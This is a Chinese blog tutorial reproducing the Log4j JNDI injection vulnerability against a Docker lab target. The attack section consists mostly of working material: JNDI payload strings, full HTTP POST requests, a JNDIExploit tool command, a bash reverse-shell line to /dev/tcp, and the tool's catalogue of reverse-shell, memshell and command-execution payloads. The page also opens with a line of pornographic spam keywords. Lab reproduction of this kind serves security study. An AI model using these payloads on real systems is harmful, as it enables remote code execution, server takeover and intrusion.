国产 无码 综合区,色欲AV无码国产永久播放,无码天堂亚洲国产AV,国产日韩欧美女同一区二区

網(wǎng)絡(luò)安全 log4j漏洞復(fù)現(xiàn)

這篇具有很好參考價值的文章主要介紹了網(wǎng)絡(luò)安全 log4j漏洞復(fù)現(xiàn)。希望對大家有所幫助。如果存在錯誤或未考慮完全的地方,請大家不吝賜教,您也可以點擊"舉報違法"按鈕提交疑問。

前言:

log4j被爆出“史詩級”漏洞。其危害非常大,影響非常廣。該漏洞非常容易利用,可以執(zhí)行任意代碼。這個漏洞的影響可謂是重量級的。

漏洞描述:

由于Apache Log4j存在遞歸解析功能,未取得身份認證的用戶,可以從遠程發(fā)送數(shù)據(jù)請求輸入數(shù)據(jù)日志,輕松觸發(fā)漏洞,最終在目標上執(zhí)行任意代碼。簡單點說,就是可以通過輸入一些具有特殊意義的字符來攻擊服務(wù)器。

如果入侵者在前端頁面上輸入了:${jndi:rmi://127.0.0.1:8080/evil} 這串字符, 然后后臺用log4j記錄了這串字符, log4j會自動使用jndi調(diào)用這個地址上的rmi內(nèi)容。如果這個rmi的內(nèi)容是刪除數(shù)據(jù)庫,重啟服務(wù)器這種惡意程序,被攻擊之后還是趁早跑路吧。(開個玩笑)

關(guān)于JNDI:

JNDI(Java Naming and Directory Interface)是Java提供的Java 命名和目錄接口。通過調(diào)用JNDI的API應(yīng)用程序可以定位資源和其他程序?qū)ο?。JNDI是Java EE的重要部分,需要注意的是它并不只是包含了DataSource(JDBC 數(shù)據(jù)源),JNDI可訪問的現(xiàn)有的目錄及服務(wù)有:JDBC、LDAP、RMI、DNS、NIS、CORBA,摘自百度百科。

關(guān)于RMI:

RMI(remote method invocation)即遠程方法調(diào)用,是允許運行在一個java虛擬機上的對象調(diào)用運行在另外一個java虛擬機上的對象的方法,JAVA RMI實現(xiàn)JAVA程序之間跨越JVM的遠程通信。通過RMI可以讓調(diào)用遠程JVM上對象方法,仿佛調(diào)用本地JVM上對象方法一樣簡單、快捷。

log4j簡介

Apache Log4j是一個用于Java的日志記錄庫,其支持啟動遠程日志服務(wù)器。
Log4j 1.2 中包含一個 SocketServer 類,該類容易受到不可信數(shù)據(jù)反序列化的影響,當偵聽不可信網(wǎng)絡(luò)流量以獲取日志數(shù)據(jù)時,該類可被利用與反序列化小工具結(jié)合使用以遠程執(zhí)行任意代碼。攻擊者可利用該漏洞執(zhí)行任意代碼。
這會影響從?1.2?到?2.14?的 Log4j 版本。

log4j環(huán)境搭建

  • log4漏洞環(huán)境搭建(需要docker)
docker pull registry.cn-hangzhou.aliyuncs.com/fengxuan/log4j_vuln
docker run -it -d -p 8080:8080 --name log4j_vuln_container registry.cn-hangzhou.aliyuncs.com/fengxuan/log4j_vuln 
docker exec -it log4j_vuln_container /bin/bash
/bin/bash /home/apache-tomcat-8.5.45/bin/startup.sh 

漏洞檢測-dnslog

測試命令

${jndi:ldap://6zb6jy.dnslog.cn}

測試過程中,使用post數(shù)據(jù)包,添加Content-type:application/x-www-form-urlencoded

POST /webstudy/hello-fengxuan HTTP/1.1
Host: 10.211.55.5:8080
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/97.0.4692.71 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: JSESSIONID=20CF7810C7E2AFE7E0B0644E35340901
Content-type:application/x-www-form-urlencoded
Connection: close
Content-Length: 33
cmd:whoami

c=${jndi:ldap://6zb6jy.dnslog.cn}

dnslog平臺成功回顯,證明系統(tǒng)存在log4j漏洞

網(wǎng)絡(luò)安全 log4j漏洞復(fù)現(xiàn)

命令執(zhí)行

使用JNDI利用工具

java -jar JNDIExploit-1.3-SNAPSHOT-2.jar -i local_ip_address(vps地址)

header:Content-type: application/x-www-form-urlencoded

header:Content-type: application/x-www-form-urlencoded
c=${jndi:ldap://0.0.0.0:1389/tomcatBypass/TomcatEcho}
cmd:whoami
cmd:bash -i >& /dev/tcp/0.0.0.0/2333 0>&1
POST /webstudy/hello-fengxuan HTTP/1.1
Host: 10.211.55.5:8080
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/97.0.4692.71 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: JSESSIONID=20CF7810C7E2AFE7E0B0644E3534090
Content-type: application/x-www-form-urlencoded
Connection: close
Content-Length: 59
cmd:whoami

c=${jndi:ldap://0.0.0.0:1389/tomcatBypass/TomcatEcho}

成功執(zhí)行命令并回顯文章來源地址http://www.zghlxwxcb.cn/news/detail-491715.html

//JNDIExploit-1.3-SNAPSHOT-2.jar 工具存在的paylaod
[+] Basic Queries: ldap://0.0.0.0:1389/Basic/[PayloadType]/[Params], e.g.
    ldap://0.0.0.0:1389/Basic/Dnslog/[domain]
    ldap://0.0.0.0:1389/Basic/Command/[cmd]
    ldap://0.0.0.0:1389/Basic/Command/Base64/[base64_encoded_cmd]
    ldap://0.0.0.0:1389/Basic/ReverseShell/[ip]/[port]  ---windows NOT supported
    ldap://0.0.0.0:1389/Basic/TomcatEcho
    ldap://0.0.0.0:1389/Basic/SpringEcho
    ldap://0.0.0.0:1389/Basic/WeblogicEcho
    ldap://0.0.0.0:1389/Basic/TomcatMemshell1
    ldap://0.0.0.0:1389/Basic/TomcatMemshell2  ---need extra header [shell: true]
    ldap://0.0.0.0:1389/Basic/JettyMemshell
    ldap://0.0.0.0:1389/Basic/WeblogicMemshell1
    ldap://0.0.0.0:1389/Basic/WeblogicMemshell2
    ldap://0.0.0.0:1389/Basic/JBossMemshell
    ldap://0.0.0.0:1389/Basic/WebsphereMemshell
    ldap://0.0.0.0:1389/Basic/SpringMemshell

[+] Deserialize Queries: ldap://0.0.0.0:1389/Deserialization/[GadgetType]/[PayloadType]/[Params], e.g.
    ldap://0.0.0.0:1389/Deserialization/URLDNS/[domain]
    ldap://0.0.0.0:1389/Deserialization/CommonsCollectionsK1/Dnslog/[domain]
    ldap://0.0.0.0:1389/Deserialization/CommonsCollectionsK2/Command/Base64/[base64_encoded_cmd]
    ldap://0.0.0.0:1389/Deserialization/CommonsBeanutils1/ReverseShell/[ip]/[port]  ---windows NOT supported
    ldap://0.0.0.0:1389/Deserialization/CommonsBeanutils2/TomcatEcho
    ldap://0.0.0.0:1389/Deserialization/C3P0/SpringEcho
    ldap://0.0.0.0:1389/Deserialization/Jdk7u21/WeblogicEcho
    ldap://0.0.0.0:1389/Deserialization/Jre8u20/TomcatMemshell
    ldap://0.0.0.0:1389/Deserialization/CVE_2020_2555/WeblogicMemshell1
    ldap://0.0.0.0:1389/Deserialization/CVE_2020_2883/WeblogicMemshell2    ---ALSO support other memshells

[+] TomcatBypass Queries
    ldap://0.0.0.0:1389/TomcatBypass/Dnslog/[domain]
    ldap://0.0.0.0:1389/TomcatBypass/Command/[cmd]
    ldap://0.0.0.0:1389/TomcatBypass/Command/Base64/[base64_encoded_cmd]
    ldap://0.0.0.0:1389/TomcatBypass/ReverseShell/[ip]/[port]  ---windows NOT supported
    ldap://0.0.0.0:1389/TomcatBypass/TomcatEcho
    ldap://0.0.0.0:1389/TomcatBypass/SpringEcho
    ldap://0.0.0.0:1389/TomcatBypass/TomcatMemshell1
    ldap://0.0.0.0:1389/TomcatBypass/TomcatMemshell2  ---need extra header [shell: true]
    ldap://0.0.0.0:1389/TomcatBypass/TomcatMemshell3  /ateam  pass1024
    ldap://0.0.0.0:1389/TomcatBypass/SpringMemshell

[+] GroovyBypass Queries
    ldap://0.0.0.0:1389/GroovyBypass/Command/[cmd]
    ldap://0.0.0.0:1389/GroovyBypass/Command/Base64/[base64_encoded_cmd]

[+] WebsphereBypass Queries
    ldap://0.0.0.0:1389/WebsphereBypass/List/file=[file or directory]
    ldap://0.0.0.0:1389/WebsphereBypass/Upload/Dnslog/[domain]
    ldap://0.0.0.0:1389/WebsphereBypass/Upload/Command/[cmd]
    ldap://0.0.0.0:1389/WebsphereBypass/Upload/Command/Base64/[base64_encoded_cmd]
    ldap://0.0.0.0:1389/WebsphereBypass/Upload/ReverseShell/[ip]/[port]  ---windows NOT supported
    ldap://0.0.0.0:1389/WebsphereBypass/Upload/WebsphereMemshell
    ldap://0.0.0.0:1389/WebsphereBypass/RCE/path=[uploaded_jar_path]   ----e.g: ../../../../../tmp/jar_cache7808167489549525095.tmp

到了這里,關(guān)于網(wǎng)絡(luò)安全 log4j漏洞復(fù)現(xiàn)的文章就介紹完了。如果您還想了解更多內(nèi)容,請在右上角搜索TOY模板網(wǎng)以前的文章或繼續(xù)瀏覽下面的相關(guān)文章,希望大家以后多多支持TOY模板網(wǎng)!

本文來自互聯(lián)網(wǎng)用戶投稿,該文觀點僅代表作者本人,不代表本站立場。本站僅提供信息存儲空間服務(wù),不擁有所有權(quán),不承擔(dān)相關(guān)法律責(zé)任。如若轉(zhuǎn)載,請注明出處: 如若內(nèi)容造成侵權(quán)/違法違規(guī)/事實不符,請點擊違法舉報進行投訴反饋,一經(jīng)查實,立即刪除!

領(lǐng)支付寶紅包贊助服務(wù)器費用

相關(guān)文章

  • 【java安全】Log4j反序列化漏洞

    【java安全】Log4j反序列化漏洞

    關(guān)于Apache Log4j Log4j是Apache的開源項目,可以實現(xiàn)對System.out等打印語句的替代,并且可以結(jié)合spring等項目,實現(xiàn)把日志輸出到控制臺或文件等。而且它還可以通過一個配置文件來靈活地進行配置,而不需要修改應(yīng)用的代碼,滿足了大多數(shù)要求。 就是用來打印日志的 漏洞成因

    2024年02月11日
    瀏覽(23)
  • ctfshow-Log4j復(fù)現(xiàn)-log4j復(fù)現(xiàn)

    ctfshow-Log4j復(fù)現(xiàn)-log4j復(fù)現(xiàn)

    1、買VPS,打開mobax進行ssh連接,開兩個終端 一個終端開啟監(jiān)聽 另一個終端進入JNDIExploit-1.2-SNAPSHOT.jar所在的目錄jndiexploit執(zhí)行下面命令 生成payload 構(gòu)造payload 輸入進去之后看結(jié)果 反彈shell成功 結(jié)束

    2024年02月12日
    瀏覽(24)
  • log4j復(fù)現(xiàn)之CVE-2017-5645

    一、靶機環(huán)境的安裝 1.docker環(huán)境安裝 2.下載vlnhub 由于網(wǎng)絡(luò)原因,直接到官網(wǎng)去下,得到的壓縮文件,然后對其解壓即可。 二、編譯啟動靶機 三、漏洞利用 1.到官網(wǎng)下載 ysoserial-all.jar 文件 2.注意運行的Java環(huán)境是1.7

    2024年02月16日
    瀏覽(49)
  • log4j漏洞詳解

    log4j漏洞詳解

    log4j全名就是(log for java),就是apache的一個開源的日志記錄組件 ,它在Java項目中使用的比較廣泛。 使用方法: ??????????????? 1.pom引入依賴 ??????????????? 2.獲取logger實例 ??????????????? 3.logger.info() debug() error() warn()... 優(yōu)點:功能豐富,易于集成

    2024年02月16日
    瀏覽(23)
  • log4j JNDI注入漏洞

    目錄 log4j JNDI注入漏洞 一、LDAP介紹 二、JDBC介紹 三、JNDI介紹 四、JNDI命名引用 五、log4j JNDI注入漏洞 ?LDAP是一種協(xié)議,LDAP 的全稱是 Lightweight Directory Access Protocol,輕量目錄訪問協(xié)議。 ?JDBC是一種規(guī)范,JDBC的全稱是Java數(shù)據(jù)庫連接(Java Database connect),它是一套用于執(zhí)行SQL語句

    2024年02月01日
    瀏覽(28)
  • Log4j遠程代碼執(zhí)行漏洞

    Log4j遠程代碼執(zhí)行漏洞

    簡介 漏洞描述 Apache Log4j 是 Apache 的一個開源項目,Apache log4j-2 是 Log4j 的升級,我們可以控制日志信息輸送的目的地為控制臺、文件、GUI組件等,通過定義每一條日志信息的級別,能夠更加細致地控制日志的生成過程。 Log4j-2中存在JNDI注入漏洞,當程序?qū)⒂脩糨斎氲臄?shù)據(jù)日志

    2024年02月11日
    瀏覽(25)
  • log4j漏洞原理及攻擊流程

    log4j漏洞原理及攻擊流程

    log4j漏洞最早出現(xiàn)在2021年11月24日一位阿里安全團隊的員工發(fā)現(xiàn)的,上報到Apache之后,12月10日凌晨才被公開。該漏洞威脅等級較高?;颈燃缗c阿里當年的fastjson漏洞。 漏洞地址: Log4j是一種流行的Java日志記錄工具,其升級版本Log4j 2存在安全漏洞。這個漏洞是由Log4j 2的lookup功

    2024年02月16日
    瀏覽(26)
  • fastJson反序列化漏洞和log4j漏洞

    有 attach.class (編譯好的文件) 攻擊者建立rmi服務(wù)端,于rmi服務(wù)端建造一系列攻擊對象 ,假設(shè)遠程地址為 http://abc,可url鏈接到惡意class-attach.class 若被攻擊者訪問到此服務(wù) rmi://abc/attach.class ,靜態(tài)代碼塊會優(yōu)先加載,無需構(gòu)造對象。 fastJson通過序列化漏洞 fastJson=1.2.47 (高版本添

    2024年02月16日
    瀏覽(24)
  • 【實戰(zhàn)】一次簡單的log4j漏洞測試

    【實戰(zhàn)】一次簡單的log4j漏洞測試

    更新時間:2021.12.19 參考文檔:https://www.yuque.com/u8021480/crow/dg9xax 在去年 log4j 漏洞剛爆發(fā)的時候,很多平臺都存在漏洞,當時也在第一時間在有授權(quán)的情況下對某論壇進行了滲透測試,結(jié)果發(fā)現(xiàn)存在漏洞,報告之后,漏洞也被很快修復(fù)。 本次對該滲透過程進行一個簡單的記錄

    2023年04月26日
    瀏覽(60)
  • 深入解析著名的阿里云Log4j 漏洞

    幾乎每個系統(tǒng)都會使用日志框架,用于記錄日志信息,這些信息可以提供程序運行的上下文,但是日志過多也會影響系統(tǒng)的性能,所以好的日志框架應(yīng)該是可靠,快速和可擴展的。 Apache Log4j2 是一個基于 Java 的日志工具,是Log4j的升級版本,引入了很多豐富的特性,包括高性

    2024年02月16日
    瀏覽(21)

覺得文章有用就打賞一下文章作者

支付寶掃一掃打賞

博客贊助

微信掃一掃打賞

請作者喝杯咖啡吧~博客贊助

支付寶掃一掃領(lǐng)取紅包,優(yōu)惠每天領(lǐng)

二維碼1

領(lǐng)取紅包

二維碼2

領(lǐng)紅包